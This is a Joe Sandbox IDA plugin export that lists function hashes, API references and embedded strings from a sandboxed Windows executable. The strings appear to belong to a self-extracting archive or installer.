Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
Instruction ID: ecab8af820fa9ffe76b94a2cbddc5cf95c4cb7d1e1fbb5183df35fa56acbbd25
Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
Instruction Fuzzy Hash: 3B32E173A081918BE71CDF24D950ABC77A1FB98B08F499139DB5A87B88DB3CE851C750

Function 00007FF70E787288 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
Instruction ID: e252f421b6f4d2e2e68f70ac1cf90da39eb23e9a3f3d63f2296d40829b727a3d
Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
Instruction Fuzzy Hash: E8C18BB7B281908FE350CF6AE400A9D7BB1F39878CB51A125DF59A3B09D639E645CB40

Function 00007FF70E7A2D58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
Instruction ID: 3cc632eb038663b2a64ca953516c85e098c1f65e0129fd03ef8cfbe2c77a06a3
Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
Instruction Fuzzy Hash: E2A13573A081C246EB25EA24D8447FEA692EFE9744F896535DE4D07796DF3CE881C320

Function 00007FF70E79AF18 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
Instruction ID: 80cac46b1ef9909cf009915e2296295d915c73636ccb477a4c40043b300539c4
Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
Instruction Fuzzy Hash: A9C10677A291E04DE302CBB5A4248FD3FF1EB1E34DB4A4251EF9666B4AD6285201DF70

Function 00007FF70E78A310 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
Instruction ID: a1148d3bf9307cdd6d0a70312391db3c0091344be19d31ea2c0935f162703b39
Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
Instruction Fuzzy Hash: 4B910462B1858196EB11EF29D8417EDA721FFA9788F842031EF4E07B49EF38D646C310

Function 00007FF70E79B534 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
Instruction ID: 4ac224750d6bfb67acf9232459eb84dd1e35a0d2149e190969adf66946f4a257
Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
Instruction Fuzzy Hash: C9611122B185D189EB11DF75D9004FDBFB1AF5E784B869032CE9A5764ACB3CE506CB20

Function 00007FF70E7A21D0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
Instruction ID: f1ffa4dc70082cc2cc68d695b26b1408614fe47b7ca5a7288eef7f1bcf2da4b7
Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
Instruction Fuzzy Hash: 78514473B181914BE3289F28E8047BDB752FB98B48F895130DB494769ADF3DE540CB10

Function 00007FF70E7A2AB0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
Instruction ID: 377cc9b7522830858ba75205f86ce117cbc54c48608caaeaa5c38048355e5c52
Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
Instruction Fuzzy Hash: 0731D6B2A185814BD718EE26D9902BEB7D1FF88344F449139DF5687742DB3CE442C710

Function 00007FF70E79DC70 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
Instruction ID: e8b93dccb6a53164415fd2e190d3be0731b7a2e662e4136e529d491cd27258f2
Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
Instruction Fuzzy Hash: DDF0FE65F1C0034AFB782038DC2933990569F1B310FD4A835E31FC62C5EBADE8815329

Function 00007FF70E7B3354 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction ID: d85718c3fe85318173eac07124f54a66c67f5d21550e788030c58ebfb2e3ffa4
Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction Fuzzy Hash: 78A0026190CC42E0F648AB10EC60575B334FF69711BD03035F44D421A4DF7CB482C325

Function 00007FF70E78D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78D964

Strings

::$DATA, xrefs: 00007FF70E78D812
:$I30:$INDEX_ALLOCATION, xrefs: 00007FF70E78D849
::$INDEX_ROOT, xrefs: 00007FF70E78D854
::$OBJECT_ID, xrefs: 00007FF70E78D880
::$EA, xrefs: 00007FF70E78D81D
::$BITMAP, xrefs: 00007FF70E78D807
:$TXF_DATA:$LOGGED_UTILITY_STREAM, xrefs: 00007FF70E78D875
::$ATTRIBUTE_LIST, xrefs: 00007FF70E78D7FC
::$REPARSE_POINT, xrefs: 00007FF70E78D88B
::$LOGGED_UTILITY_STREAM, xrefs: 00007FF70E78D85F
:$EFS:$LOGGED_UTILITY_STREAM, xrefs: 00007FF70E78D86A
::$EA_INFORMATION, xrefs: 00007FF70E78D828
::$FILE_NAME, xrefs: 00007FF70E78D833
::$INDEX_ALLOCATION, xrefs: 00007FF70E78D83E

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
API String ID: 3668304517-727060406
Opcode ID: 74d68d42448b2834d40d390ad32eed462d68e051ec4e29c63c0154d737a3ceed
Instruction ID: eb46a88c5cd9c53461370ca666a23f642892c669916631b387f6625e1fb6480d
Opcode Fuzzy Hash: 74d68d42448b2834d40d390ad32eed462d68e051ec4e29c63c0154d737a3ceed
Instruction Fuzzy Hash: B241D836B05B0199FB14AF65E8803E973A9EF58798F80213ADA5C077A9EF38E155C350

Function 00007FF70E7B2A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF70E7B2A26
GetModuleHandleW.KERNEL32 ref: 00007FF70E7B2A33
GetModuleHandleW.KERNEL32 ref: 00007FF70E7B2A48
GetProcAddress.KERNEL32 ref: 00007FF70E7B2A60
GetProcAddress.KERNEL32 ref: 00007FF70E7B2A73
CreateEventW.KERNEL32 ref: 00007FF70E7B2A9F
DeleteCriticalSection.KERNEL32 ref: 00007FF70E7B2AEB
CloseHandle.KERNEL32 ref: 00007FF70E7B2AFD

Strings

kernel32.dll, xrefs: 00007FF70E7B2A41
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF70E7B2A2C
SleepConditionVariableCS, xrefs: 00007FF70E7B2A56
WakeAllConditionVariable, xrefs: 00007FF70E7B2A66

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction ID: c0bae91a0ae87b26def5240f55e25d24a8fd6c79c9f4d2006a01e9f7af2a0353
Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction Fuzzy Hash: DB213E60E1AA8382FA58FB50EC55274B3A4AF5C794FC83439D94E027A1DF3CF4868321

Function 00007FF70E796A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7970A6

Part of subcall function 00007FF70E782004: std::_Xinvalid_argument.LIBCPMT ref: 00007FF70E78200F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7970B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7970B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7970C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7970D6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7970DC

Strings

\\?\, xrefs: 00007FF70E796A57, 00007FF70E796A66
UNC, xrefs: 00007FF70E796BBF
DXGIDebug.dll, xrefs: 00007FF70E796A18

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: DXGIDebug.dll$UNC$\\?\
API String ID: 4097890229-4048004291
Opcode ID: 4f1437804bcdce90e20cec30e65ff0fa4fbfed6c2bf85bcea305f217ae80ce6c
Instruction ID: 3926d845111a877fc85998de2c39bbbcf3580ecc9f7acf13e31aaf9576f9f2c6
Opcode Fuzzy Hash: 4f1437804bcdce90e20cec30e65ff0fa4fbfed6c2bf85bcea305f217ae80ce6c
Instruction Fuzzy Hash: D812D222B19B4280EB10EB75E8441ADA371EF89B98F906236DB5D07BE9DF3CD545C360

Function 00007FF70E7A6E80 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF70E7A7E9B), ref: 00007FF70E7A7080
CreateStreamOnHGlobal.COMBASE ref: 00007FF70E7A70B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A717B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A7181
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A7187

Strings

<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00007FF70E7A6ED5, 00007FF70E7A6EE4
<html>, xrefs: 00007FF70E7A6F13
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF70E7A6F2C, 00007FF70E7A6F3B
</html>, xrefs: 00007FF70E7A6F72, 00007FF70E7A6F81

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2868844859-1533471033
Opcode ID: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
Instruction ID: f246bde4b019a5ac2f06cc1296cb159ccbe250b771d585cfc38c4f2ff625c21b
Opcode Fuzzy Hash: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
Instruction Fuzzy Hash: 6081AF62F18A4285FB04EBA5DC402EDB371AF9C794F846136DE1D1769AEF38D546C320

Function 00007FF70E7BE650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7BE7CD

Strings

nan(ind), xrefs: 00007FF70E7BE706
inf, xrefs: 00007FF70E7BE6D6
NAN(SNAN), xrefs: 00007FF70E7BE6E5
NAN(IND), xrefs: 00007FF70E7BE6FB
INF, xrefs: 00007FF70E7BE6C3
nan(snan), xrefs: 00007FF70E7BE6F0
nan, xrefs: 00007FF70E7BE6B8
NAN, xrefs: 00007FF70E7BE6B1

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction ID: d8fb57faa4a81118925ed7df6a9ae4b18c1ec1ee72caf3c5a44602645e4be140
Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction Fuzzy Hash: 32419C72A09B4589E705DF25E8417E9B3A8EF18398F81523AEE8C07B54DF38D065C354

Function 00007FF70E7AF390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 00007FF70E7AF3CF
GetClassNameW.USER32 ref: 00007FF70E7AF3FC
GetWindowLongPtrW.USER32 ref: 00007FF70E7AF41D
SendMessageW.USER32 ref: 00007FF70E7AF437
GetObjectW.GDI32 ref: 00007FF70E7AF452
SendMessageW.USER32 ref: 00007FF70E7AF487
DeleteObject.GDI32 ref: 00007FF70E7AF490
GetWindow.USER32 ref: 00007FF70E7AF49E

Strings

STATIC, xrefs: 00007FF70E7AF402

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassDeleteLongName
String ID: STATIC
API String ID: 2845197485-1882779555
Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction ID: c6a6aee6445aa54fdf53a27c2434c40b5126ce6935bfd602542abe52b51ac90a
Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction Fuzzy Hash: 28316F25B08A4286FA64BB11ED547B9A3A1EFCDBD4F882434DD4D07B55DF3CD4068760

Function 00007FF70E7AAE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

LICENSEDLG, xrefs: 00007FF70E7AAEAE

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ItemTextWindow
String ID: LICENSEDLG
API String ID: 2478532303-2177901306
Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
Instruction ID: 945d3e3a9580ee78027f91e26482aac697712c0414ac195583326e6a2abdae2f
Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
Instruction Fuzzy Hash: 1A416E21B0CA5282FB54AB15EC54779A3A1EF8CF85F986535D90E07BA5CF3CE586C320

